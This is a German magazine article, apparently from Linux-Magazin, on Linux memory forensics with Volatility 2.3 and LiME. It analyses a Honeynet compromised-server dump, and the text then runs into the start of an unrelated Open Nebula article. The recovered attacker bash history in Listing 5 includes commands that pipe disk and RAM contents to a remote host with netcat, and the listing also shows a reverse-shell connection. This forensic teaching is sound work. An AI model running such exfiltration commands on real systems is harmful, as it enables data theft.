Schritte in Eigenregie nachvollziehen
will, braucht nur drei Sachen: eine Installation
einer aktuellen Volatility-Version,
einen heruntergeladenen Übungsdump
und ein zu seinem Linux-Kernel passendes
Profil. Die Beispiele in diesem
Artikel beziehen sich auf Ubuntu 13.04
(die 64-Bit-Variante). Wer dagegen ein
eigenes, real existierendes System unter
die Lupe nehmen will, muss mit Tools
wie Lime einen eigenen, individuellen
Speicherabzug erstellen.
Memory Dumps erstellen
Einen solchen Memory Dump für Windows-Betriebssysteme
zu generieren ist
einfach. Meist kommen dafür Produkte
DELUG-DVD
Auf der DVD dieser Ausgabe finden
Sie alle Tools und über 50 Linux-Kernel-
DELUG-DVD
Profile aus dem Artikel, dazu mehrere Images
und die Software von Volatility und Lime.

wie die Helix-CD [6] zum Einsatz, die
dafür diverse Programme mitbringen. Einen
Memory Dump für Linux anzufertigen
ist dagegen bedeutend aufwändiger:
Für jede Kernelversion muss der Admin
einen passenden Treiber selbst erstellen
– beispielsweise auf einem identischen,
virtualisierten System.
Mit Empfehlung: Lime
Volatility empfiehlt Lime (als ».tgz«-Datei
auf [7]) zu benutzen, auch in den
Tests der Autoren des Linux-Magazins
arbeitete die Toolsammlung gut. Zuerst
legt der Anwender ein neues Verzeichnis
an und entpackt dort die Datei
»lime‐forensics‐1.1‐r17.tar.gz«. Nach
dem Make-Aufruf findet er das Modul
»lime‐3.2.0‐49‐generic.ko«. Die entsprechende
Kernelversion lässt sich hier bereits
am Dateinamen erkennen.
Auf der DELUG-DVD findet der Leser
über 50 von den Autoren bereitgestellte
Module für zahlreiche Kernelvarianten,
die sich schnell auf ein Testsystem übertragen
lassen.
Insmod
Den Treiber lädt »insmod«, sodass der
folgende Befehl einen Memory Dump in
»/tmp/ubuntu1204.dump« erzeugt:
insmod lime‐3.2.0‐49‐generic.koU
"path=/tmp/ubuntu1204.dump format=lime"
Wer Volatility bereits installiert hat, kann
den Speicherabzug jetzt überprüfen:
vol.py ‐f ubuntu1204.dump ‐‐profile=U
LinuxUbuntu1204_3_2_0_49x64 linux_ifconfig
Im Beispiel nutzt der Anwender einen der
weiter unten in diesem Artikel beschriebenen
Volatility-Befehle, hier »linux_ifconfig«,
der die zuletzt benutzten IPs und
NICs auflistet. Das Ergebnis sollte Zeilen
wie die folgenden enthalten:
Interface IP MAC Promiscous Mode
lo 127.0.0.1 00:00:00:00:00:00 False
eth0 192.168.2.2 00:00:00:00:00:00 False
sit0 0.0.0.0 00:00:00:00:00:00 Falseme"
Fehlerhafte Ausgaben wie »No suitable
address space mapping found« oder Fehler
bei dem Versuch, das Abbild zu öffnen,
weisen auf ein defektes Image oder
eine falsche Profildatei hin. Dann hilft es
Volatility 2.3 11/2013
Sysadmin
www.linux-magazin.de
69
Listing 1: »vol.py ‐‐info | grep Win«
01 Volatile Systems Volatility Framework 2.3_beta
02 VistaSP0x64 ‐ A Profile for Windows Vista SP0 x64
03 VistaSP0x86 ‐ A Profile for Windows Vista SP0 x86
04 VistaSP1x64 ‐ A Profile for Windows Vista SP1 x64
05 VistaSP1x86 ‐ A Profile for Windows Vista SP1 x86
06 VistaSP2x64 ‐ A Profile for Windows Vista SP2 x64
07 VistaSP2x86 ‐ A Profile for Windows Vista SP2 x86
08 Win2003SP0x86 ‐ A Profile for Windows 2003 SP0 x86
09 Win2003SP1x64 ‐ A Profile for Windows 2003 SP1 x64
10 Win2003SP1x86 ‐ A Profile for Windows 2003 SP1 x86
11 Win2003SP2x64 ‐ A Profile for Windows 2003 SP2 x64
12 Win2003SP2x86 ‐ A Profile for Windows 2003 SP2 x86
13 Win2008R2SP0x64 ‐ A Profile for Windows 2008 R2 SP0 x64
14 Win2008R2SP1x64 ‐ A Profile for Windows 2008 R2 SP1 x64
15 Win2008SP1x64 ‐ A Profile for Windows 2008 SP1 x64
16 Win2008SP1x86 ‐ A Profile for Windows 2008 SP1 x86
17 Win2008SP2x64 ‐ A Profile for Windows 2008 SP2 x64
18 Win2008SP2x86 ‐ A Profile for Windows 2008 SP2 x86
19 Win7SP0x64 ‐ A Profile for Windows 7 SP0 x64
20 Win7SP0x86 ‐ A Profile for Windows 7 SP0 x86
21 Win7SP1x64 ‐ A Profile for Windows 7 SP1 x64
22 Win7SP1x86 ‐ A Profile for Windows 7 SP1 x86
23 WinXPSP1x64 ‐ A Profile for Windows XP SP1 x64
24 WinXPSP2x64 ‐ A Profile for Windows XP SP2 x64
25 WinXPSP2x86 ‐ A Profile for Windows XP SP2 x86
26 WinXPSP3x86 ‐ A Profile for Windows XP SP3 x86
27 WindowsCrashDumpSpace32 ‐ This AS supports windows Crash Dump format
28 WindowsCrashDumpSpace64 ‐ This AS supports windows Crash Dump format
29 WindowsHiberFileSpace32 ‐ This is a hibernate address space for
windows hibernation files.

Sysadmin
www.linux-magazin.de Volatility 2.3 11/2013
70
vielleicht, nach Alternativen zu suchen,
die es für Linux durchaus gibt.
Fmem, Coldboot und
Msramdump
Fmem [8] beispielsweise ersetzt die
noch unter Kernel 2.4 übliche Methode,
mit »dd« und »/dev/mem« oder »/dev/
kmem« Memory Dumps anzufertigen.
Optimale Zusammenarbeit mit Volatility
erreicht jedoch nur Lime.
Eine recht interessante Alternativmethode
bietet ein Coldboot-Angriff, den
Wissenschaftler der Princeton-Universität
beschreiben [1]. Der McGrew-Security-
RAM-Dumper Msramdump [9] nutzt die
genannten Eigenschaften in Form eines
bootfähigen USB-Sticks. Der enthält eine
FAT-16-Partition, die per Syslinux bootet
und automatisch einen Memory Dump
zieht. Groß genug sollte der Stick allerdings
sein, denn auf dem Datenträger
landet auch noch eine zweite Partition,
in die Msramdump standardmäßig die
RAM-Abbilder schreibt.
Eigenen USB-Stick basteln
oder Image ziehen?
Wer sich einen Coldboot-Stick – wie unter
[9] beschrieben – nicht selbst basteln
möchte, findet auch dafür ein Image
auf der Heft-DVD. Eine Zusammenarbeit
mit Volatility darf da allerdings niemand
erwarten, doch immerhin funktioniert
auch hier die traditionelle Auswertung
Listing 2: »vol.py --info | grep Linux«
01 Volatile Systems Volatility Framework 2.3_beta
02 LinuxDebian5_26x86 ‐ A Profile for Linux Debian5_26 x86
03 LinuxEvo4GARM ‐ A Profile for Linux Evo4G ARM
04 LinuxUbuntu1204_3_2_0_23x64 ‐ A Profile for Linux Ubuntu1204_3_2_0_23 x64
05 LinuxUbuntu1204_3_2_0_32x64 ‐ A Profile for Linux Ubuntu1204_3_2_0_32 x64
06 LinuxUbuntu1204x64 ‐ A Profile for Linux Ubuntu1204 x64
07 LinuxUbuntu1304_3_8_0_25x64 ‐ A Profile for Linux Ubuntu1304_3_8_0_25 x64
08 Linuxdfrws‐profilex86 ‐ A Profile for Linux dfrws‐profile x86
09 linux_yarascan ‐ A shell in the Linux memory image
mit Unix-Tools wie Strings und Grep. Ansonsten
hilft nur Lime wirklich weiter.
Volatility installieren
Weil Volatility offiziell immer noch im
Betastadium steckt, muss der Admin zu
Quellcode und Subversion greifen. Mit
svn checkout http://volatility.googlecode.U
com/svn/trunk Volatility
installiert er das Framework aus dem
Sourcecode-Repository. Möglich ist bereits
hier, die Installation um zusätzliche
Plugins anzureichern, Details bietet die
Projektseite [10] unter dem Stichwort
„Full Installation“.
Ein erster Test erfolgt mit »./vol.py ‐h«.
Die Meldung sollte die aktuelle Version
2.3 Beta bestätigen:
Volatile Systems Volatility FrameworkU
2.3_beta
»./vol.py ‐‐info« liefert erdrückend viele
Informationen und ist sinnvollerweise
vom Admin durch Grep-Befehle zu reduzieren
(Listing 1). »vol.py ‐‐info | grep
Win« gibt Auskunft über die Windows-
Unterstützung, die die Entwickler seit
dem Linux-Magazin-Artikel 2008 ebenfalls
stark erweitert haben.
Listing 2 zeigt die Linux-Module, doch
Anwender, die folgende Beispiele in Eigenregie
nachvollziehen, erleben gleich
eine herbe Enttäuschung: Die meisten
gelieferten Informationen sind nur wenig
hilfreich. Während Volatility eine Vielzahl
von Windows-Profilen mitbringt,
fehlen solche für Linux komplett, der
Anwender muss sie selbst erstellen. Das
ist zwar kein Hexenwerk, es gilt allerdings
zu bedenken, dass ein Profil nur
für eine Kernel-Version oder -Architektur
funktioniert. Selbst die Distribution spielt
eine Rolle: Ein Profil mit Kernel 3.2.x von
Debian passt auch nicht zu einem Kernel
3.2.x von Ubuntu.
Als dieser Artikel entstand, hatte beispielsweise
Ubuntu 12.04 LTS bereits 24
Kernelversionen ausgeliefert. Da hat die
Linux-Vielfalt auch mal einige Nachteile.
Damit wird klar, warum professionelle
Volatility-Anwender virtuelle Systeme mit
einer Vielzahl von Kernelversionen bereithalten,
um im Einsatzfall schnell ein
Profil parat zu haben. Ein guter Anfang
ist das Paket auf der DELUG-DVD.
Liegt lediglich ein Memory-Dump vor,
ohne dass die entsprechende Kernelversion
bekannt ist, so reicht ein Strings-Befehl
im Dump mit einem Grep nach dem
Begriff »vmlinuz«. Schnell ist die passende
Kernelversion gefunden, in einem
virtuellen System erstellt der Anwender
dann das Profil.
Debugging-Profile und
-Standards für Zwerge
Ein Profil besteht aus den beiden Dateien
»System.map‐Kernelversion« und »modules.dwarf«.
Während die erste meist
schon im »/boot«-Verzeichnis vorliegt,
muss der Admin die zweite selbst erzeugen.
Dazu benutzt er das Programm
»dwarfdump« aus gängigen Repositories.
Mehr Informationen über das Dwarf-
Debugging-File-Format beziehungsweise
den Dwarf-Debugging-Standard Dwarfstd
gibt dessen Webseite [11].
Im Verzeichnis »volatility/tools/linux«
finden sich alle Dateien, um »modules.
dwarf« zu erstellen. Ein Aufruf von Make
in diesem Verzeichnis erzeugt die Datei,
die der Admin zusammen mit der
Listing 3: Zweimal Strings im Einsatz
01 strings victoria‐v8.memdump.img | grep vmlinuz
02 # kernel /vmlinuz root=/dev/hda2 ro
03 kernel /boot/vmlinuz‐2.6.26‐2‐686 root=/dev/sda1 ro
04 kernel /boot/vmlinuz‐2.6.26‐2‐686 root=/dev/sda1 ro single
05 kernel /vmlinuz root=/dev/hdb1
06 # kernel /vmlinuz root=/dev/hda2 ro
07 kernel /boot/vmlinuz‐2.6.26‐2‐686 root=/dev/sda1 ro quiet
08 kernel /boot/vmlinuz‐2.6.26‐2‐686 root=/dev/sda1 ro single
09
10 strings victoria‐v8.memdump.img | grep 2.6.26‐2‐686 | grep ‐i title
11 title Debian GNU/Linux, kernel 2.6.26‐2‐686
12 title Debian GNU/Linux, kernel 2.6.26‐2‐686 (single‐user mode)
13 title Debian GNU/Linux, kernel 2.6.26‐2‐686
14 title Debian GNU/Linux, kernel 2.6.26‐2‐686 (single‐user mode)

Der im Folgenden verwendete infizierte
Memory Dump stammt aus dem Honeynet-2001-Projekt
[12]. Das Image selbst
ist ebenfalls als Download verfügbar
und hört auf den Namen »victoria‐v8.
memdump.img.zip«. Die Wahrscheinlichkeit,
dass so ein Image auf Übungsrechnern
ganz einfach mit Volatilitys
Kernelmodulen funktioniert, ist nach
den beschriebenen Anforderungen recht
gering. Deshalb analysiert das folgende
Beispiel das Image, um mehr Informationen
über den eingesetzten Kernel zu
erhalten (Listing 3), und findet den recht
betagten Debian-Kernel 2.6.26-2.
Ein virtuelles Debian mit Kernel 2.6.26-
2-686 installieren, um mit den zuvor
genannten Schritten eine Profildatei zu
erstellen, wäre jetzt die nächste Aufgabe.
DELUG-Leser sparen sich die Arbeit und
greifen direkt auf die passende Profildatei
auf der Heft-DVD zu. Wie oben beschrieben,
landet das File im Verzeichnis »volatility/plugins/overlays/linux«.
Volatility 2.3 11/2013
Sysadmin
www.linux-magazin.de
71
Testen
Abbildung 1: Ein Grep nach »Linux« zeigt Profile, ein Grep auf »linux« listet die Volatility-Befehle.
System-Map aus dem laufenden System
nun per Zip komprimiert:
zip Ubuntu1304_3_8_0_26.zip modules.dwarfU
/boot/System.map‐3.8.0‐26‐generic
Der Name des Zip-File spielt hier keine
Rolle, eine passende Benennung hilft
aber bei späteren Arbeitsschritten bei der
Auswahl des Profils. Damit Volatility das
Zip-File bei der Profilauswahl erkennt,
kopiert der Admin es nach »volatility/
plugins/overlays/linux«. Ab sofort sollte
»./vol.py ‐‐info | grep Linux« auch das gewünschte,
neu erstellte Profil anzeigen.
Dumps
Ob alles funktioniert, lässt sich mit einem
einfachen Befehl überprüfen, der
Auskunft über die installierte CPU des
kompromittierten Systems gibt (Listing
4). Für eine Information, die aus dem
Memory Dump eines Systems stammt,
Listing 4: »vol.py ‐‐profile«
01 #vol.py ‐f victoria‐v8.memdump.img ‐‐profile
02
LinuxDebian5_26x86 linux_cpuinfo
03 Volatile Systems Volatility Framework 2.3_beta
04 Processor Vendor Model
05 ‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐ ‐‐‐‐‐
06 0 GenuineIntel Intel(R) Core(TM)2 CPU T7200 @ 2.00GHz

Sysadmin
www.linux-magazin.de Volatility 2.3 11/2013
72
von dem weder die Hardware noch die
Festplatte vorliegt, ist das ein recht beachtliches
Ergebnis. »‐f« übergibt dabei
den Namen des Memory Dump an Volatility,
»‐‐profile LinuxDebian5_26x86« legt
die passende Profildatei fest und »linux_
cpuinfo« ist der eigentliche Befehl.
Um die etwas lang geratenen Kommandozeilen
für die anstehenden Arbeiten
zu vereinfachen, stellt Volatility Exportvariablen
bereit:
export VOLATILITY_PROFILE=LinuxDebian5_26x86
export VOLATILITY_LOCATION=file:///tmp/U
victoria‐v8.memdump.img
So bleibt die Kommandozeile übersichtlich
und kurz: »./vol.py linux_cpuinfo«.
Alle Linux-spezifischen Befehle beginnen
mit »linux_«, Grep-Kommandos liefern
über Pipes weitere Aufschlüsse (Abbildung
1). Listing 5 bietet eine Auswahl
der interessantesten Kommandos von
Mounts über Netzwerkbefehle bis hin zu
offenen Ports und Bash-History.
Ein fremder Exim-Server
und Netcat-Verbindungen
Wie Listing 5 und Abbildung 2 zeigen,
hat im Demo-System ein lokaler Angreifer
die installierte Exim4-Version deinstalliert
und gegen eine andere ausgetauscht, die
nicht aus dem Repository stammt. Die gefundene
Netcat-Verbindung hat er wohl
benutzt, um die Partition »/dev/sda1«
und den Inhalt des Arbeitsspeichers zu
übertragen.
Jetzt wären die Logfiles des Mailservers
für die weitere Auswertung aussagekräftig.
Doch leider ließen sich die nicht aus
dem Arbeitsspeicher rekonstruieren.
Beim Honeynet-2011-Fall liegt aber zusätzlich
zum Memory Dump auch die
Festplatte des kompromittierten Systems
vor, beispielsweise mit der Bash-History.
Doch dass der interessierte Angreifer über
Wget Schadsoftware eingeschleust hat,
lässt sich auch aus dem Memory Dump
erkennen – schon mit Unix-Standardtools:
Verdächtige Einträge wie »wget«, »tar.gz«
oder »tgz« sucht der Strings-Befehl:
Listing 5: »vol.py«-Kommandos
01 # vol.py linux_mount
02 Volatile Systems Volatility Framework 2.3_beta
03 [...]
04 sysfs rw,nosuid,nodev,noexec
05 udev /dev tmpfs rw
06 tmpfs /lib/init/rw tmpfs rw,nosuid
07 /dev/sda1 / ext3 rw none
08 /proc proc rw,nosuid,nodev,noexec
09 devpts /dev/pts devpts rw,nosuid,noexec
10 usbfs /proc/bus/usb usbfs rw,nosuid,nodev,noexec
11 tmpfs /dev/shm tmpfs rw,nosuid,nodev
12 [...]
13 # vol.py linux_arp
14 Volatile Systems Volatility Framework 2.3_beta
15 [:: ] at 00:00:00:00:00:00 on lo
16 [192.168.56.1 ] at 0a:00:27:00:00:00 on eth0
17 [192.168.56.101 ] at 08:00:27:28:5a:cc on eth0
18
19 # vol.py linux_netstat
20 Volatile Systems Volatility Framework 2.3_beta
21 UDP 0.0.0.0:111 0.0.0.0:0 portmap/1429
22 TCP 0.0.0.0:111 0.0.0.0:0 LISTEN portmap/1429
23 UDP 0.0.0.0:769 0.0.0.0:0 rpc.statd/1441
24 UDP 0.0.0.0:38921 0.0.0.0:0 rpc.statd/1441
25 TCP 0.0.0.0:39296 0.0.0.0:0 LISTEN rpc.statd/1441
26 UDP 0.0.0.0:68 0.0.0.0:0 dhclient3/1624
27 UNIX /dev/log
28 UNIX /var/run/acpid.socket
29 TCP :::22 :::0 LISTEN sshd/1687
30 TCP 0.0.0.0:22 0.0.0.0:0 LISTEN sshd/1687
31 TCP :::25 :::0 LISTEN exim4/1942
32 TCP 0.0.0.0:25 0.0.0.0:0 LISTEN exim4/1942
33 TCP 192.168.56.102:43327 192.168.56.1:4444 ESTABLISHED sh/2065
34 TCP 192.168.56.102:43327 192.168.56.1:4444 ESTABLISHED sh/2065
35 TCP 192.168.56.102:43327 192.168.56.1:4444 ESTABLISHED sh/2065
36 TCP 192.168.56.102:25 192.168.56.101:37202 CLOSE sh/2065
37 TCP 192.168.56.102:25 192.168.56.101:37202 CLOSE sh/2065
38 TCP 192.168.56.102:56955 192.168.56.1:8888 ESTABLISHED nc/2169
39
40 # vol.py linux_psaux | egrep '(2065|2169)'
41 Volatile Systems Volatility Framework 2.3_beta
42 2065 0 0 sh 2169 0 0 nc 192.168.56.1 8888
43
44 # vol.py linux_bash
45 Volatile Systems Volatility Framework 2.3_beta
46 Pid Name Command Time Command
47 ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐
48 2042 bash 2011‐02‐06 14:04:39 UTC+0000 apt‐get remove exim4
49 [...]
50 2042 bash 2011‐02‐06 14:04:39 UTC+0000 scp yom@192.168.56.1:/home/
yom/temporary/exmi4/* .
51 [...]
52 2042 bash 2011‐02‐06 14:04:39 UTC+0000 vi update‐exim4.conf.conf
53 2042 bash 2011‐02‐06 14:04:39 UTC+0000 update‐exim4.conf
54 2042 bash 2011‐02‐06 14:04:39 UTC+0000 halt
55 2042 bash 2011‐02‐06 14:04:39 UTC+0000 reboot
56 2042 bash 2011‐02‐06 14:04:39 UTC+0000 whereis gcc
57 2042 bash 2011‐02‐06 14:04:39 UTC+0000 whereis memdump
58 2042 bash 2011‐02‐06 14:04:39 UTC+0000 apt‐get install memdump
59 2042 bash 2011‐02‐06 14:04:39 UTC+0000 halt
60 2042 bash 2011‐02‐06 14:04:39 UTC+0000 ifconfig
61 2042 bash 2011‐02‐06 14:04:39 UTC+0000 ping 192.168.56.1
62 2042 bash 2011‐02‐06 14:04:39 UTC+0000 mount
63 2042 bash 2011‐02‐06 14:04:39 UTC+0000 sudo dd if=/dev/sda | nc
192.168.56.1 4444
64 [...]
65 2042 bash 2011‐02‐06 14:04:39 UTC+0000 apt‐get install memdump
66 2042 bash 2011‐02‐06 14:04:39 UTC+0000 netstat ‐ant
67 2042 bash 2011‐02‐06 14:04:39 UTC+0000 apt‐get install ddrescue
68 2042 bash 2011‐02‐06 14:04:39 UTC+0000 apt‐get install dcfldd
69 2042 bash 2011‐02‐06 14:04:39 UTC+0000 ls /dev/kmem
70 2042 bash 2011‐02‐06 14:04:39 UTC+0000 ls /dev/mem
71 2042 bash 2011‐02‐06 14:04:39 UTC+0000 halt
72 2042 bash 2011‐02‐06 14:04:39 UTC+0000 ifconfig
73 2042 bash 2011‐02‐06 14:04:39 UTC+0000 ifconfig
74 2042 bash 2011‐02‐06 14:04:39 UTC+0000 reboot
75 2042 bash 2011‐02‐06 14:04:46 UTC+0000 ifconfig
76 2042 bash 2011‐02‐06 14:24:43 UTC+0000 dd if=/dev/sda1 | nc
192.168.56.1 8888
77 2042 bash 2011‐02‐06 14:42:29 UTC+0000 memdump | nc 192.168.56.1
8888

Abbildung 2: Das Volatility-Tool Yarascan hat eine gespawnte Shell gefunden,
über die ein Angreifer offensichtlich Daten übertragen hat.
strings ‐td victoria‐v8.memdump.img | U
egrep '(\.tar|\.tgz|.\tar\.gz)'
Das liefert recht viele Treffer, darunter
auch »rk.tar« am Offset »4« (Listing 6).
In dessen Umkreis finden sich meist noch
mehr spannende Fakten. Seltsamerweise
ist dies hier nicht der Fall. Wer das physische
Dateisystem greifbar hat, kann die
Dateien rund um »rk.tar« inspizieren.
Dateien über den Tmp-FS-
Cache rekonstruieren
Infos
[1] Ergebnisse der Universität Princeton:
[https:// citp. princeton. edu/ research/​
memory/]
[2] Volatility:
[http:// code. google. com/ p/ volatility/]
[3] Achim Leitner, „Einbruch“: Linux-Magazin
06/08, S. 29: [http:// www. linux‐magazin.​
de/ Ausgaben/ 2008/ 06/ Einbruch/​]
[4] Lime: [http:// code. google. com/ p/​
lime‐forensics/]
[5] Memory Dumps: [http:// code. google. com/​
p/ volatility/ wiki/ SampleMemoryImages]
[6] Helix-CD:
[http:// www. e‐fense. com/ products. php]
[7] Lime-Download: [http:// code. google. com/​
p/ lime‐forensics/ downloads/ list]
[8] Fmem: [http:// hysteria. sk/ ~niekt0/ fmem/]
[9] Msramdump: [http:// www.​
mcgrewsecurity. com/ tools/ msramdmp/]
[10] Volatility mit Plugins: [http:// code. google.​
com/ p/ volatility/ wiki/ FullInstallation]
[11] Dwarf: [http:// dwarfstd. org]
[12] Ein infizierter Server zum Üben:
[http:// www. honeynet. org/ challenges/​
2011_7_compromised_server]
[13] Sleuthkit: [http://www.sleuthkit.org/]
Auch der Befehl »linux_mount« kann erhellende
Informationen liefern, die jetzt
zum Tragen kommen, etwa ob das System
das heute selbstverständliche
Tmp-FS
benutzt hat. Das temporäre
Dateisystem
hält fast immer eine
Kopie des Dateisystems
als Cache im
RAM vor.
Mit etwas Glück lassen
sich so Dateien,
in diesem Beispiel »rk.
tar«, aus dem Arbeitsspeicher rekonstruieren.
Genau dafür liefert Volatility den
Befehl »linux_dentry_cache«:
vol.py
linux_dentry_cache > bodyfile
Die Ausgabedatei liegt, wie der verwendete
Name bereits vermuten lässt, im forensischen
Bodyfile-Format vor. Mactime,
ein Programm aus dem Sleuthkit [13],
hilft und wandelt sie in ein lesbares Format
um (Listing 7).
Fehlerhafte
Implementierung
Aber leider weist das rekonstruierte
Body file-Format immer noch einen Fehler
bei der Wiederherstellung des Datums
auf – der 11. Februar 2080 wird wohl
nicht das Erstellungsdatum gewesen sein.
Die Datei ist als Beweismittel daher mit
Vorsicht zu genießen. Die Entwickler sind
hierüber bereits informiert, doch die Rekonstruktion
von »rk.tar« bleibt damit
derzeit erfolglos, zumindest für den, der
das Dateisystem nicht hat.
Immerhin lässt sich als Proof-of-Concept
die Datei »/etc/passwd« wiederherstellen:
vol.py linux_find_file ‐F "/etc/passwd"
Volatile Systems Volatility Framework U
2.3_beta
Inode Number
Inode
‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐
48355 0xcf033e48
Listing 6: »strings« mit »awk«
01 strings ‐td victoria‐v8.memdump.img| awk
'$1>253507000 && $1 < 253509999 {print}'
02 253507096 sshd
03 253507231 info
04 253507363 5Tj‐0000Ym‐DX‐D
05 253507493 Pm5SK‐0000Yf‐0U‐D
06 253507628 Mq‐0000XR‐N4‐D
07 253507889 om_adj
08 253508020 hosts.deny
Der virtuelle Inode im gecachten System
liegt also bei 0xcf033e48. Nach dem
Aufruf von »vol.py linux_find_file ‐i
0xcf033e48 ‐O /tmp/passwd« liegt eine
Kopie der rekonstruierten Passwd-Datei
im Verzeichnis »/tmp«.
Fazit
Für die neueste Version von Volatility
haben die Entwickler viel geleistet. Neue
Linux-Befehle erweitern den Befehlsumfang
gewaltig. Verglichen mit den bisherigen
Methoden der Memory-Auswertung,
die sich meist auf Strings-Befehle beschränken
musste, erscheinen die neuen
Tools wie ein Quantensprung, der in der
Version 2.3 ja auch auf Android und I-OS
kommen soll. Wermutstropfen bleibt die
Profilerstellung. Die zeitaufwändige Prozedur
ist aber nicht Volatility anzulasten,
hier wären eher Distributionshersteller in
der Pflicht.
n
Der Autor
Hans-Peter Merkel ist mit
dem Schwerpunkt Datenforensik
seit vielen Jahren
in der Open-Source-
Community aktiv. Er bildet
Mitarbeiter von Strafverfolgungsbehörden
in Europa, Asien und Afrika aus
und engagiert sich als Gründer und Vorsitzender
bei Freioss und Linux4afrika.
Listing 7: »mactime«
01 # mactime ‐b bodyfile > bodyfile.mac
02 # cat bodyfile.mac
03 [...]
04 Sun Feb 11 2080 08:21:56 4421289 .a.. 0 101 103
39467 tmp/rk.tar
05 Sun Feb 11 2080 08:22:04 4421289 m... 0 101 103
39467 tmp/rk.tar
06 Sun Feb 11 2080 08:22:12 4421289 ...b 0 101 103
39467 tmp/rk.tar
09 253508152 alternatives
10 253508216 @f37
11 253508284 hosts.allow
12 253508551 _adj
13 253508683 5Rz‐0000Xt‐U0‐D
14 253508944 rk.tar
15 253509208 exim
16 253509340 exim
17 253509472 input
Volatility 2.3 11/2013
Sysadmin
www.linux-magazin.de
73

Sysadmin
www.linux-magazin.de Open Nebula 11/2013
74
Open Nebula mit Hooks erweitern
Action am Haken
An Hooks, also an Haken, können trittsichere Open-Nebula-Anwender ihre Shellprogramme einklicken, die bei
Statusänderungen virtueller Maschinen automatisch Aktionen auslösen. Der Berg ruft. Nils Magnus
und Funktionsumfangs und mit jeweils
eigenen Konzepten wählen.
Wegen der Verschiedenartigkeit abzudeckender
Einsatzszenarien gebärden sich
die meisten Cloudstacks aber komplex
und erfordern eine langwierige Einarbeitung.
Dass bei normalen Anforderungen
der Benutzer auch schneller vorangehen
kann, will das aus Spanien stammende
Open Nebula [5] beweisen.
Schlanke Cloudverwaltung
aus Spanien
© gregeperson, photocase.com
Virtualisierung hat die Schlagzahl
beträchtlich erhöht – mit KVM, Xen,
VMware & Co. stellt der Admin neue
Systeme viel schneller bereit, als sich
neue Hardware in den Zeiten dedizierter
Server beschaffen ließ. Die gewonnene
Zeit bringt der nun für viel mehr Systeme
Verantwortliche mit dem Klonen
von Image-Konfigurationen, dem Kopieren
von Verzeichnissen und dem Mounten
von Speicherressourcen zu. Richtig
knifflig wird es, wenn die Hardware nach
Wartung ruft, denn dann gilt es, virtuelle
Maschinen herunterzufahren, zu verschieben
und neu zu starten.
Wer die Schwemme an Handgriffen reduzieren
will, greift zu einer Infrastructureas-a-Service-Lösung
(IaaS). Sie nimmt
sich der wichtigsten Aufgaben der Servervirtualisierung
an, verwaltet Basisinfrastruktur
wie DNS und DHCP und stellt
dem Admin eine Weboberfläche zur Verfügung.
Mit Open Stack [1], Open QRM
[2], Eucalyptus [3] oder Ganeti [4] darf
der Systemverwalter aus Open-Source-
Produkten unterschiedlicher Herkunft
Die Software verbrachte ihre Kindheit
im akademischen Elternhaus des Grid
Computing, mittlerweile gilt sie als leichtgewichtige
Enterprise-Lösung [6]. Der
amerikanische Teilchenbeschleuniger
Fermilab verwaltet damit mehrere Hundert
virtuelle Maschinen, auf industrieller
Seite listet das Projekt unter anderem
Telefonica und Akamai als Anwender. Die
Hauptentwickler von C12G Labs bieten
kommerziellen Support an und bauen
derzeit ein internationales Partnernetzwerk
auf [7].
Open Nebula zeichnet sich durch schlichte
Eleganz aus. Wo andere IaaS-Wettbewerber
vom Admin fordern, ein halbes
Dutzend Dienste und Komponenten zu
installieren und zu konfigurieren, kommt
Open Nebula mit wenigen Komponenten
und nur einem Frontend zum Steuern
und Konfigurieren der eigenen Cloud aus,
dem Open Nebula Sunstone. Der Kasten
Listing 1: Ausschnitt aus »/etc/one/oned.conf«
01 VM_HOOK = [
07 VM_HOOK = [
02 name = "vm_einschalten",
08 name = "vm_ausschalten",
03 on = "RUNNING",
09 on = "STOP",
04 command = "account.sh",
10 command = "account.sh",
05 arguments = "on $ID" ]
11 arguments = "off $ID" ]
06
12 [...]
DELUG-DVD
Auf der Heft-DVD dieser Ausgabe
finden Sie den hier im Artikel unter [6]
DELUG-DVD
referenzierten Open-Nebula-Artikel aus der
Ausgabe 10/2011 als PDF-Dokument. Er erklärt
die Grundlagen und das Setup der Version 3
nochmals ausführlicher.

„Installation“ skizziert die Inbetriebnahme,
Abbildung 1 die Architektur.
Versionen und Features
Open Nebula nennt seine Releases nach
interstellaren Nebeln. Die im Mai 2013
veröffentlichte stabile Version 4.0 taufte
das Projekt „Eagle“ – nach dem rund
7000 Lichtjahre entfernten Adlernebel,
einem Mitte des 18. Jahrhunderts entdecktem
Sternenhaufen. Gegenüber der
rund zwei Jahre älteren 3.x-Linie kamen
Bugfixes und vor allem eine Runderneuerung
der Weboberfläche Sunstone dazu.
Die betraf zum Beispiel den VNC-Zugriff
auf virtuelle Maschinen.
Die neueste Version 4.2 mit dem Codenamen
„Flame“ erschien Anfang August
2013. Der namengebende Flammennebel
liegt im Sternenbild Orion, sein Licht benötigt
rund 1000 Jahre bis zu uns. Die
Macher des Projekts haben die Bedienung
der Sunstone-Oberfläche für Flame etwas
rundgeschliffen. Neu ist eine vereinfachte
Ansicht, die sich explizit an Anwender
wendet, die nur eine VM provisionieren
und nicht den ganzen Cluster einrichten
möchten. Admins können nun die Größe
der Images besser beobachten und eingreifen,
falls eine VM aus dem Ruder
zu laufen droht. Dazu monitort Open
Nebula neuerdings diese Ressource.
Hypervisor
Admin
Virtualisierungshost 1
VM 1 VM 2
Browser
VM 3 VM 4 VM 5
HTTP
Ganz neu haben die Entwickler das Backend
für die VMware-Virtualisierung geschrieben,
die sich nun einfacher installieren
lässt und weniger Abhängigkeiten
besitzt. Der Xen-Treiber nutzt neuerdings
die XL-Funktionen von Version 4.0 des
Hypervisors.
Unter Open-Nebula-Anwendern hat sich
die Praxis etabliert, in Testumgebungen
die neueste Version der Features wegen
zu benutzen, für den Produktivbetrieb
jedoch die vorletzte Version. Die im
Folgenden beschriebenen Programmierschnittstelle
existierte zwar schon in der
Frontend
Sunstone
Hypervisor
3er Version, ihre ganze Funktionalität
entfaltet sich aber erst mit der 4.0.
Am Hook
Steuerung der VMs per SSH
VM 6
One-
API
Virtualisierungshost 2
VM 7 VM 8 VM 9
Open Nebula Server
